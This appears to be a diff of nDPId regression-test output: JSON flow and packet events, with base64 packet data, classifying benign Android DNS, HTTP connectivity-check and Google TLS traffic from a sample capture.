{"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}} +00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976024844,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.7.248.176"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1490976024847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1490976024847,"pkt":"AMDKkaPvePiC0\/vCCABFAABLWkpAAEARM16sECrYrBAqAdlDADUAN19T54QBAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAE="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024847,"flow_last_seen":1490976024847,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": 
{"query":"connectivitycheck.android.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1490976024848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1490976024848,"pkt":"ePiC0\/vCAMDKkaPvCABFAABbz+1AAEARvaqsECoBrBAq2AA12UMAR0w654SBgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2FuZHJvaWQDY29tAAABAAHADAABAAEAAAEYAASs2QmO"} -00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} 
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976024848,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.android.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.9.142"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976024857,"flow_last_seen":1490976024857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976024857,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1490976024857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024857,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8rxxAAEAG\/k+sECrYrNkJjutWAFC1gOcZAAAAAKAC\/\/\/pcgAAAgQFtAQCCAoA9kgFAAAAAAEDAwg="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1490976024894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976024894,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8rv4AADQGSm6s2QmOrBAq2ABQ61bhGRrktYDnGqASpajwtAAAAgQFZAQCCApVvgGZAPZIBQEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1490976024896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976024896,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0rx1AAEAG\/lasECrYrNkJjutWAFC1gOca4Rka5YAQAVfDfgAAAQEICgD2SAlVvgGZ"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976024857,"flow_last_seen":1490976024899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976024899,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1490976027514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976027514,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WktAAEARM2qsECrYrBAqAc\/EADUAKrjvz8MBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 
-00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027514,"flow_last_seen":1490976027514,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976027514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1490976027522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027522,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WkxAAEARM2usECrYrBAqAc17ADUAKKL+U00BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027522,"flow_last_seen":1490976027522,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027522,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1490976027523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027523,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NFAAEARvNWsECoBrBAq2AA1zXsAOK5EU02BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027523,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1490976027560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1490976027560,"pkt":"ePiC0\/vCAMDKkaPvCABFAABr0NVAAEARvLKsECoBrBAq2AA1z8QAV0oUz8OBgAABAAIAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAUAAQABUX8AEQxtb2JpbGUtZ3RhbGsBbMASwC4AAQABAAABKwAErcLfvA=="} 
-00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976027560,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.223.188"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027567,"flow_last_seen":1490976027567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027567,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1490976027567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027567,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81nRAAEAG\/9+sECrYrcLfvKd+FGxeQZ9gAAAAAKAC\/\/\/gAAAAAgQFtAQCCAoA9kkUAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1490976027617,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027617,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA86FEAACsGQwOtwt+8rBAq2BRsp36O4XTVXkGfYaASpajFDgAAAgQFZAQCCAor\/EXWAPZJFAEDAwc="} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} -01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1490976027724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027724,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk1AAEARM2qsECrYrBAqASjeADUAKB2sfT0BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 